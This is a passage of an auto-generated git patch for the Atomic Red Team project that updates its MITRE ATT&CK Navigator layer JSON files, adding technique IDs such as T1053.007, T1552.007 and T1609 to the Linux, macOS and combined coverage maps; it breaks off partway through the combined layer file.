From 507e5b87166102b6c81d74a9d3232b3cb25c6a5a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 21 May 2021 20:26:14 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 399 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 84 +- atomics/Indexes/Indexes-CSV/macos-index.csv | 84 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 832 +- .../Indexes/Indexes-Markdown/linux-index.md | 284 +- .../Indexes/Indexes-Markdown/macos-index.md | 241 +- .../Indexes/Indexes-Markdown/windows-index.md | 26 +- atomics/Indexes/Matrices/linux-matrix.md | 92 +- atomics/Indexes/Matrices/macos-matrix.md | 82 +- atomics/Indexes/Matrices/matrix.md | 196 +- atomics/Indexes/Matrices/windows-matrix.md | 106 +- atomics/Indexes/index.yaml | 49645 +++++++++------- atomics/T1003.003/T1003.003.md | 2 +- atomics/T1036.003/T1036.003.md | 2 +- atomics/T1037.004/T1037.004.md | 10 +- atomics/T1055.001/T1055.001.md | 4 +- atomics/T1055.012/T1055.012.md | 2 +- atomics/T1056.004/T1056.004.md | 6 +- atomics/T1059.003/T1059.003.md | 4 +- atomics/T1059.005/T1059.005.md | 2 +- atomics/T1070.005/T1070.005.md | 2 +- atomics/T1070/T1070.md | 2 +- atomics/T1078.001/T1078.001.md | 2 +- atomics/T1124/T1124.md | 4 +- atomics/T1127.001/T1127.001.md | 2 +- atomics/T1133/T1133.md | 4 +- atomics/T1134.004/T1134.004.md | 2 +- atomics/T1135/T1135.md | 2 +- atomics/T1176/T1176.md | 10 +- atomics/T1197/T1197.md | 8 +- atomics/T1207/T1207.md | 2 +- atomics/T1218.007/T1218.007.md | 2 +- atomics/T1220/T1220.md | 2 +- atomics/T1222.002/T1222.002.md | 2 +- atomics/T1485/T1485.md | 4 +- atomics/T1486/T1486.md | 4 +- atomics/T1489/T1489.md | 4 +- atomics/T1496/T1496.md | 4 +- atomics/T1497.001/T1497.001.md | 4 +- atomics/T1546.004/T1546.004.md | 10 +- atomics/T1546.010/T1546.010.md | 2 +- atomics/T1546.011/T1546.011.md | 2 +- atomics/T1546.012/T1546.012.md | 2 +- atomics/T1547.001/T1547.001.md | 2 +- atomics/T1547.006/T1547.006.md | 2 +- atomics/T1550.002/T1550.002.md | 6 +- atomics/T1550.003/T1550.003.md | 8 +- atomics/T1552.001/T1552.001.md | 2 +- atomics/T1555.003/T1555.003.md | 4 +- atomics/T1566.001/T1566.001.md | 4 +- atomics/T1574.001/T1574.001.md | 9 +- atomics/T1574.002/T1574.002.md | 6 +- atomics/T1574.006/T1574.006.md | 10 +- 57 files changed, 27909 insertions(+), 24336 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 4ddbfaa0..ccd92526 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 347ecd11..23c8d246 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index c4b91b77..02a7985d 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true}